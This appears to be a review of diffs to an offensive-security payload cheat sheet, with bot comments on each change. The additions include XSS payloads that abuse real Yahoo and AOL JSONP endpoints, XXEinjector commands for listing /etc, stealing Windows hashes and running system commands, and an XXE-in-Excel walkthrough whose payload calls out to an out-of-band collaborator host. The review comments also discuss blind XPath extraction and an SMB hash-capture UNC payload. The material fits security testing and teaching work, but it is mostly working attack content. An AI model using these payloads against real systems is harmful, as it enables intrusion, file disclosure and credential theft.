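Review bot: the second Blind Exploitation example, `substring(...)=codepoints-to-string(INT_ORD_CHAR_HERE)`, uses an XPath 2.0 function; against an XPath 1.0 engine (libxml2-based stacks such as PHP `DOMXPath` or Python `lxml`) the call fails with an unknown-function error and the oracle returns false for every character, so the block should say it is 2.0-only and that the `=CHAR_HERE` form is the portable one. Style: the XPath expressions are fenced as `sql` and the Out Of Band URL as `powershell`; `xpath` and `text` would be accurate. For the OOB `doc('//10.10.10.10/SHARE')` line, a sentence that the UNC path makes a Windows server authenticate to the share over SMB, which is what the newly added Osanda Malith reference covers, would tie the reference to the payload.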
@ -24,6 +24,9 @@
|
||||
#Uber.com:
|
||||
"><script+src="https://mkto.uber.com/index.php/form/getKnownLead?callback=alert(document.domain);"></script>
|
||||
#AOL/Yahoo
|
||||
"><script+src="https://ads.yap.yahoo.com/nosdk/wj/v1/getAds.do?cb=alert(1337)"></script>
|
||||
"><script+src="https://mempf.yahoo.co.jp/offer?position=h&callback=alert(1337)"></script>
|
||||
"><script+src="https://suggest-shop.yahooapis.jp/Shopping/Suggest/V1/suggester?callback=alert(1)//&appid=dj0zaiZpPVkwMDJ1RHlqOEdwdCZzPWNvbnN1bWVyc2VjcmV0Jng9M2Y-"></script>
|
||||
"><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script>
|
||||
"><script+src="https://df-webservices.comet.aol.com/sigfig/ws?service=sigfig_portfolios&porttype=2&portmax=5&rf=http://www.dailyfinance.com&callback=jsonCallback24098%3balert(1)%2f%2f476&_=1537149044679"></script>
|
||||
"><script+src="https://api.cmi.aol.com/content/alert/homepage-alert?site=usaol&callback=confirm(1);//jQuery20108887725116629929_1528071050373472232&_=1528071050374"></script>
|
||||
|
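Review bot: the new Yahoo/AOL JSONP endpoints are third-party URLs that stop working as soon as the vendor changes its callback handling, and several carry session-specific values that play no part in the injection (`jQuery1120033838593671435757_1537274810388`, `_=1537274810389`, the `appid=...` on `suggest-shop.yahooapis.jp`); trim them to the minimal `callback=alert(1)//` form and date the entries so readers know when they were last seen working. Also worth one note that the `+` in `<script+src=` is a URL-encoded space, as elsewhere in the file.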
@ -416,6 +416,12 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu
|
||||
- Referer Header
|
||||
- Custom Site Analytics
|
||||
- Administrative Panel logs
|
||||
- User Agent
|
||||
- Custom Site Analytics
|
||||
- Administrative Panel logs
|
||||
- Comment Box
|
||||
- Administrative Panel
|
||||
|
||||
|
||||
## Polyglot XSS
|
||||
|
||||
|
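Review bot: `Custom Site Analytics` and `Administrative Panel logs` now appear twice at the same level as `Referer Header` and `User Agent`, so the list no longer reads as header followed by where it gets rendered; indent the two sub-items under each header entry (the way `Comment Box` followed by `Administrative Panel` is meant to read) so the repetition is visibly intentional rather than a duplicated paste.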
@ -30,6 +30,7 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
|
||||
- [XXE inside SVG](#xxe-inside-svg)
|
||||
- [XXE inside SOAP](#xxe-inside-soap)
|
||||
- [XXE inside DOCX file](#xxe-inside-docx-file)
|
||||
- [XXE inside XLSX file](#xxe-inside-xlsx-file)
|
||||
|
||||
## Tools
|
||||
|
||||
@ -41,7 +42,31 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
|
||||
```
|
||||
$ python3 230.py 2121
|
||||
```
|
||||
|
||||
- [XXEinjector](https://github.com/enjoiz/XXEinjector)
|
||||
```bash
|
||||
# Enumerating /etc directory in HTTPS application:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl
|
||||
# Enumerating /etc directory using gopher for OOB method:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher
|
||||
# Second order exploitation:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt
|
||||
# Bruteforcing files using HTTP out of band method and netdoc protocol:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc
|
||||
# Enumerating using direct exploitation:
|
||||
ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK
|
||||
# Enumerating unfiltered ports:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all
|
||||
# Stealing Windows hashes:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes
|
||||
# Uploading files using Java jar:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf
|
||||
# Executing system commands using PHP expect:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls
|
||||
# Testing for XSLT injection:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt
|
||||
# Log requests only:
|
||||
ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt
|
||||
```
|
||||
|
||||
## Detect the vulnerability
|
||||
|
||||
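Review bot: every XXEinjector command passes `--host=192.168.0.2` without saying what it is; in XXEinjector `--host` is the attacker-side address the target connects back to for the out-of-band channel, and the target itself comes from the saved HTTP request in `--file`, so a reader who puts the victim's IP there gets nothing. State that once above the block, and say that `/tmp/req.txt` has to be the raw request with the XML body and the injection point marked as the tool expects; the `--file` and `--2ndfile` flags otherwise look like output paths. Also, the hunk drops the `python3 230.py 2121` context line straight into the new tool entry without a blank line, which makes the fenced blocks run together in the rendered page.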
@ -382,6 +407,56 @@ JPG (experimental)
|
||||
GIF (experimental)
|
||||
```
|
||||
|
||||
### XXE inside XLSX file
|
||||
|
||||
Extract the excel file.
|
||||
|
||||
```powershell
|
||||
$ mkdir XXE && cd XXE
|
||||
$ unzip ../XXE.xlsx
|
||||
Archive: ../XXE.xlsx
|
||||
inflating: xl/drawings/drawing1.xml
|
||||
inflating: xl/worksheets/sheet1.xml
|
||||
inflating: xl/worksheets/_rels/sheet1.xml.rels
|
||||
inflating: xl/sharedStrings.xml
|
||||
inflating: xl/styles.xml
|
||||
inflating: xl/workbook.xml
|
||||
inflating: xl/_rels/workbook.xml.rels
|
||||
inflating: _rels/.rels
|
||||
inflating: [Content_Types].xml
|
||||
```
|
||||
|
||||
Add your blind XXE payload inside `xl/workbook.xml`.
|
||||
|
||||
```powershell
|
||||
<xml...>
|
||||
<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://YOURCOLLABORATORID.burpcollaborator.net/"> ]>
|
||||
<x>&xxe;</x>
|
||||
<workbook...>
|
||||
```
|
||||
|
||||
Rebuild the Excel file.
|
||||
|
||||
```powershell
|
||||
$ zip -r ../poc.xslx *
|
||||
updating: [Content_Types].xml (deflated 71%)
|
||||
updating: _rels/ (stored 0%)
|
||||
updating: _rels/.rels (deflated 60%)
|
||||
updating: docProps/ (stored 0%)
|
||||
updating: docProps/app.xml (deflated 51%)
|
||||
updating: docProps/core.xml (deflated 50%)
|
||||
updating: xl/ (stored 0%)
|
||||
updating: xl/workbook.xml (deflated 56%)
|
||||
updating: xl/worksheets/ (stored 0%)
|
||||
updating: xl/worksheets/sheet1.xml (deflated 53%)
|
||||
updating: xl/styles.xml (deflated 60%)
|
||||
updating: xl/theme/ (stored 0%)
|
||||
updating: xl/theme/theme1.xml (deflated 80%)
|
||||
updating: xl/_rels/ (stored 0%)
|
||||
updating: xl/_rels/workbook.xml.rels (deflated 66%)
|
||||
updating: xl/sharedStrings.xml (deflated 17%)
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
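Review bot: `zip -r ../poc.xslx *` misspells the extension (`xslx` should be `xlsx`), and the zip listing that follows contains `docProps/` entries the earlier `unzip` listing does not, so the two listings were not taken from the same file; regenerate both from one workbook. Two smaller points: the shell commands and the XML fragment are fenced as `powershell` (`bash` and `xml` would be accurate), and in the payload `<x>&xxe;</x>` is placed before `<workbook...>`, which gives the document a second root element; a streaming parser may still fetch the entity before it rejects the second root, but placing `&xxe;` inside an element under `<workbook>` is the form that works against strict parsers too.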
@ -403,3 +478,4 @@ GIF (experimental)
|
||||
* [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
|
||||
* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe)
|
||||
- [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation)
|
||||
- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/)
|
||||
|
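Review bot: the new Excel reference uses a `-` bullet (as does the gosecure entry above it) while the rest of the list uses `*`, and its title is in all caps (`EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN`); normalise to `* [Exploiting XXE with Excel - Marc Wickenden - November 12, 2018](https://www.4armed.com/blog/exploiting-xxe-with-excel/)` to match the `Title - Author - Date` form of the entries above.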